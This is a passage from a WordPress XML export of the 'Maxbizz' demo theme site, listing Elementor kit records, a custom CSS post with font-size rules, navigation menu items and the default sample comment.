		<wp:post_date_gmt><![CDATA[2020-10-02 03:26:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[maxbizz]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[custom_css]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														</item>
					<item>
		<title>Default Kit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/?elementor_library=default-kit-2-2</link>
		<pubDate>Thu, 03 Sep 2020 08:41:52 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?elementor_library=default-kit</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1290</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 08:41:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 08:41:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[default-kit-2-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[kit]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.4]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Default Kit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/?elementor_library=default-kit-2-3</link>
		<pubDate>Mon, 19 Oct 2020 03:06:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/?elementor_library=default-kit</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1431</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 03:06:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 03:06:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[default-kit-2-3]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[kit]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>maxbizz</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/maxbizz-2/</link>
		<pubDate>Mon, 26 Oct 2020 03:09:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/26/maxbizz-2/</guid>
		<description></description>
		<content:encoded><![CDATA[.widget .recent-news h6{
	font-size: 17px;
}
.post-nav .info-post h6{
	font-size: 18px;
}
]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1533</wp:post_id>
		<wp:post_date><![CDATA[2020-10-26 03:09:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-26 03:09:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[maxbizz-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[custom_css]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														</item>
					<item>
		<title>Default Kit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/?elementor_library=default-kit-2</link>
		<pubDate>Mon, 02 Nov 2020 03:58:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/?elementor_library=default-kit</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1702</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 03:58:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 03:58:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[default-kit-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[kit]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.12]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_page_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{s:9:"site_name";s:16:"Maxbizz Business";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:comment>
			<wp:comment_id>2</wp:comment_id>
			<wp:comment_author><![CDATA[A WordPress Commenter]]></wp:comment_author>
			<wp:comment_author_email><![CDATA[wapuu@wordpress.example]]></wp:comment_author_email>
			<wp:comment_author_url>https://wordpress.org/</wp:comment_author_url>
			<wp:comment_author_IP><![CDATA[]]></wp:comment_author_IP>
			<wp:comment_date><![CDATA[2020-11-02 03:58:36]]></wp:comment_date>
			<wp:comment_date_gmt><![CDATA[2020-11-02 03:58:36]]></wp:comment_date_gmt>
			<wp:comment_content><![CDATA[Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from <a href="https://gravatar.com" rel="nofollow ugc">Gravatar</a>.]]></wp:comment_content>
			<wp:comment_approved><![CDATA[1]]></wp:comment_approved>
			<wp:comment_type><![CDATA[comment]]></wp:comment_type>
			<wp:comment_parent>0</wp:comment_parent>
			<wp:comment_user_id>0</wp:comment_user_id>
							</wp:comment>
					</item>
					<item>
		<title>Pages</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/pages/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/pages/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1704</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pages]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>2</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[custom]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1704]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[custom]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[#]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1748/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1748/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1748</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1748]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>3</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1704]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[487]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1749/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1749/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1749</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1749]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>12</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1704]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[597]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1750/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1750/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1750</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1750]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>13</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1704]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[604]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1751/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1751/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1751</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1751]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>29</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[455]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1752/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1752/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1752</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1752]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>9</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1704]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[624]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1753/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1753/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1753</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1753]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>11</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1704]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[566]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1754/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1754/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1754</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1754]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>6</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1704]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[529]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1755/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1755/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
